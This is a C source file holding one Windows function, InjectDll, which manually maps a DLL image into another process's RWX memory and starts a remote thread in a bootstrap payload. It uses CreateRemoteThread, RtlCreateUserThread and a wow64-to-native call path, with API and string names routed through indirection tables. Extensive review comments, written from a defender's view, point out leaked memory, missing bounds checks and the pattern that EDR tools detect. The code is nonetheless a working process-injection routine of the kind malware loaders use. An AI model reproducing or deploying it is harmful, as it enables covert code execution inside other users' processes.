/// @brief Manually maps an in-memory DLL image into another process and starts a
///        remote thread in a small bootstrap payload that finishes the load
///        (relocations, imports) from inside the target.
///
/// Only a 32-bit build has a body (`#ifndef _WIN64`): a 64-bit build of this
/// function does nothing at all and still returns TRUE, which a caller will
/// misread as success.
///
/// @param dllBuffer  Raw PE image of the DLL to map. It is trusted completely:
///                   e_lfanew, NumberOfSections, PointerToRawData and
///                   SizeOfRawData are used with no bounds check against the
///                   buffer length (which is not even passed in), so a malformed
///                   image makes this process read out of bounds.
/// @param hProcess   Handle to the target process; only checked for NULL, so an
///                   invalid or under-privileged handle surfaces as FALSE from the
///                   first allocation.
/// @param x64        TRUE when the target (and the DLL image) is 64-bit; selects
///                   the wow64-to-native helpers (VirtualAllocEx64,
///                   WriteProcessMemory64, GetModuleHandle64, GetProcAddress64,
///                   X64Call — all defined elsewhere in the project).
/// @return TRUE on success (or unconditionally on a 64-bit build); FALSE when a
///         remote allocation, write or thread creation fails.
///
/// Review notes (defender's view):
///  - Every failure path after the first allocation leaks the remote RWX regions
///    (there is no VirtualFreeEx anywhere), and the thread handles obtained at the
///    end of each branch are never closed.
///  - The sequence VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory of
///    a PE header plus sections -> remote thread started at an address not backed
///    by a loaded module is the classic cross-process injection pattern that
///    ETW/EDR-based detections key on; nothing here is stealthy by design.
BOOL InjectDll(BYTE *dllBuffer, HANDLE hProcess, BOOL x64)
{
#ifndef _WIN64
    if(!hProcess)
        return FALSE;
    // PE headers are read straight out of the caller-supplied buffer; neither
    // the MZ/PE signatures nor e_lfanew are validated.
    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *) dllBuffer;
    IMAGE_NT_HEADERS64 *ntHeaders64;   // set and read only when x64 (compilers warn "may be uninitialized")
    IMAGE_NT_HEADERS32 *ntHeaders32;   // set and read only when !x64
    if(x64)
        ntHeaders64 = (IMAGE_NT_HEADERS64 *) (dllBuffer + dosHeader->e_lfanew);
    else
        ntHeaders32 = (IMAGE_NT_HEADERS32 *) (dllBuffer + dosHeader->e_lfanew);
    // Remote image region: one RWX allocation of SizeOfImage in the target.
    // It is never released on the failure returns that follow.
    DWORD64 dllRemoteAddress = NULL;
    if(x64)
    {
        dllRemoteAddress = VirtualAllocEx64(hProcess, NULL, ntHeaders64->OptionalHeader.SizeOfImage,
            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    }
    else
    {
        dllRemoteAddress = (DWORD64) Funcs::pVirtualAllocEx(hProcess, NULL, ntHeaders32->OptionalHeader.SizeOfImage,
            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    }
    if(!dllRemoteAddress)
        return FALSE;
    // Second RWX region holding the InjectData parameter block followed by the
    // bootstrap code (payload64/payload32 and their sizes are file-level
    // globals, not visible here). Also leaked on later failure returns.
    DWORD64 payloadRemoteAddress = NULL;
    if(x64)
    {
        payloadRemoteAddress = VirtualAllocEx64(hProcess, NULL, sizeof(InjectData64) + payloadSize64,
            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    }
    else
    {
        payloadRemoteAddress = (DWORD64) Funcs::pVirtualAllocEx(hProcess, NULL, sizeof(InjectData32) + payloadSize32,
            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    }
    if(!payloadRemoteAddress)
        return FALSE;
    PVOID injectData;
    IMAGE_SECTION_HEADER *sectionHeader;
    if(x64)
    {
        // Section table immediately follows the NT headers.
        sectionHeader = (IMAGE_SECTION_HEADER *) (ntHeaders64 + 1);
        // Headers first, then each section with raw data at its RVA (file layout
        // -> memory layout). No check that PointerToRawData + SizeOfRawData lies
        // inside dllBuffer, or that VirtualAddress + SizeOfRawData fits in
        // SizeOfImage.
        if(!WriteProcessMemory64(hProcess, dllRemoteAddress, dllBuffer, ntHeaders64->OptionalHeader.SizeOfHeaders, NULL))
            return FALSE;
        for(DWORD i = 0; i < ntHeaders64->FileHeader.NumberOfSections; ++i)
        {
            if(sectionHeader[i].SizeOfRawData == 0)
                continue;
            if(!WriteProcessMemory64(hProcess, dllRemoteAddress + sectionHeader[i].VirtualAddress,
                dllBuffer + sectionHeader[i].PointerToRawData, sectionHeader[i].SizeOfRawData, NULL))
            {
                return FALSE;
            }
        }
        // Parameter block for the remote bootstrap: image base, the relocation
        // and import directories resolved to remote addresses, and the ntdll
        // loader routines it will call. The ntdll addresses are looked up in
        // this process and assumed to be valid in the target — nothing here
        // verifies that ntdll is mapped at the same base there.
        InjectData64 injectData64;
        injectData64.base = (DWORD64) dllRemoteAddress;
        injectData64.baseRelocation = (DWORD64) dllRemoteAddress +
            ntHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
        injectData64.importDesc = (DWORD64) dllRemoteAddress +
            ntHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
        DWORD64 hNtdll64 = GetModuleHandle64((wchar_t *) Strs::wNtdll);
        injectData64.aRtlInitAnsiString = GetProcAddress64(hNtdll64, (char *) Strs::rtlInitAnsiString);
        injectData64.aRtlAnsiStringToUnicodeString = GetProcAddress64(hNtdll64, (char *) Strs::rtlAnsiStringToUnicodeString);
        injectData64.aLdrLoadDll = GetProcAddress64(hNtdll64, (char *) Strs::ldrLoadDll);
        injectData64.aLdrGetProcedureAddress = GetProcAddress64(hNtdll64, (char *) Strs::ldrGetProcedureAddress);
        injectData64.aRtlFreeUnicodeString = GetProcAddress64(hNtdll64, (char *) Strs::rtlFreeUnicodeString);
        injectData = &injectData64;
        if(!WriteProcessMemory64(hProcess, (DWORD64) payloadRemoteAddress, injectData, sizeof(InjectData64), NULL))
            return FALSE;
        if(!WriteProcessMemory64(hProcess, (DWORD64) payloadRemoteAddress + sizeof(InjectData64), (LPVOID) payload64, payloadSize64, NULL))
            return FALSE;
        // Thread start = bootstrap code, parameter = the InjectData block.
        // X64Call (defined elsewhere) forwards the ten arguments to the native
        // RtlCreateUserThread; a non-zero result is treated as a failed NTSTATUS.
        // The CLIENT_ID defined here is local to this block; the returned hThread
        // is never closed.
        DWORD64 hThread;
        struct CLIENT_ID { DWORD64 UniqueProcess; DWORD64 UniqueThread; };
        CLIENT_ID clientId;
        DWORD64 pRtlCreateUserThread = GetProcAddress64(hNtdll64, (char *) Strs::rtlCreateUserThread);
        if(X64Call(pRtlCreateUserThread, 10, (DWORD64) hProcess, (DWORD64) NULL, (DWORD64) FALSE, (DWORD64) 0, (DWORD64) 0, (DWORD64) 0,
            (DWORD64) payloadRemoteAddress + sizeof(InjectData64), (DWORD64) payloadRemoteAddress, (DWORD64) &hThread, (DWORD64) &clientId))
        {
            return FALSE;
        }
    }
    else
    {
        // 32-bit target: same mapping steps through Funcs::p* pointers (presumably
        // dynamically resolved Win32 imports — defined elsewhere), with the same
        // missing bounds checks as the x64 branch.
        sectionHeader = (IMAGE_SECTION_HEADER *) (ntHeaders32 + 1);
        if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) dllRemoteAddress, dllBuffer, ntHeaders32->OptionalHeader.SizeOfHeaders, NULL))
            return FALSE;
        for(DWORD i = 0; i < ntHeaders32->FileHeader.NumberOfSections; ++i)
        {
            if(sectionHeader[i].SizeOfRawData == 0)
                continue;
            if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) ((BYTE *) dllRemoteAddress + sectionHeader[i].VirtualAddress),
                (PVOID) ((BYTE *) dllBuffer + sectionHeader[i].PointerToRawData), sectionHeader[i].SizeOfRawData, NULL))
            {
                return FALSE;
            }
        }
        // Parameter block as in the x64 branch. ntdll is resolved via LoadLibraryA
        // here (GetModuleHandle64 above); the HMODULE is not released, which is
        // harmless for ntdll but inconsistent.
        InjectData32 injectData32;
        injectData32.base = (DWORD) dllRemoteAddress;
        injectData32.baseRelocation = (DWORD) (IMAGE_BASE_RELOCATION *) ((BYTE *) dllRemoteAddress +
            ntHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
        injectData32.importDesc = (DWORD) (IMAGE_IMPORT_DESCRIPTOR *) ((BYTE *) dllRemoteAddress +
            ntHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
        HMODULE hNtdll = Funcs::pLoadLibraryA(Strs::ntdll);
        injectData32.aRtlInitAnsiString = (DWORD) GetProcAddress(hNtdll, Strs::rtlInitAnsiString);
        injectData32.aRtlAnsiStringToUnicodeString = (DWORD) GetProcAddress(hNtdll, Strs::rtlAnsiStringToUnicodeString);
        injectData32.aLdrLoadDll = (DWORD) GetProcAddress(hNtdll, Strs::ldrLoadDll);
        injectData32.aLdrGetProcedureAddress = (DWORD) GetProcAddress(hNtdll, Strs::ldrGetProcedureAddress);
        injectData32.aRtlFreeUnicodeString = (DWORD) GetProcAddress(hNtdll, Strs::rtlFreeUnicodeString);
        injectData = &injectData32;
        if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) payloadRemoteAddress, injectData, sizeof(InjectData32), NULL))
            return FALSE;
        if(!Funcs::pWriteProcessMemory(hProcess, (BYTE *) payloadRemoteAddress + sizeof(InjectData32), (LPVOID) payload32, payloadSize32, NULL))
            return FALSE;
        // Thread creation API is chosen by OS major version (<= 5 means XP/2003).
        // NOTE(review): GetVersionExA is deprecated and, on Windows 8.1+, reports a
        // compatibility-shimmed version unless the executable is manifested — the
        // branch taken may not match the real OS; confirm if this matters.
        OSVERSIONINFOEXA osVersion = { 0 };
        osVersion.dwOSVersionInfoSize = sizeof(osVersion);
        Funcs::pGetVersionExA((LPOSVERSIONINFOA) &osVersion);
        if(osVersion.dwMajorVersion <= 5)
        {
            // Returned thread handle is discarded without CloseHandle.
            if(!Funcs::pCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) ((BYTE *) payloadRemoteAddress + sizeof(InjectData32)), (PVOID) payloadRemoteAddress, 0, NULL))
                return FALSE;
        }
        else
        {
            // This CLIENT_ID is not the block-local struct from the x64 branch; it
            // must come from a header in scope (presumably winternl.h — verify).
            // hThread is never closed here either.
            HANDLE hThread;
            CLIENT_ID clientId;
            if(Funcs::pRtlCreateUserThread(hProcess, NULL, FALSE, 0, 0, 0, ((BYTE *) payloadRemoteAddress + sizeof(InjectData32)), (PVOID) payloadRemoteAddress, &hThread, &clientId))
                return FALSE;
        }
    }
#endif
    // Reached on success — and, on a 64-bit build, unconditionally.
    return TRUE;
}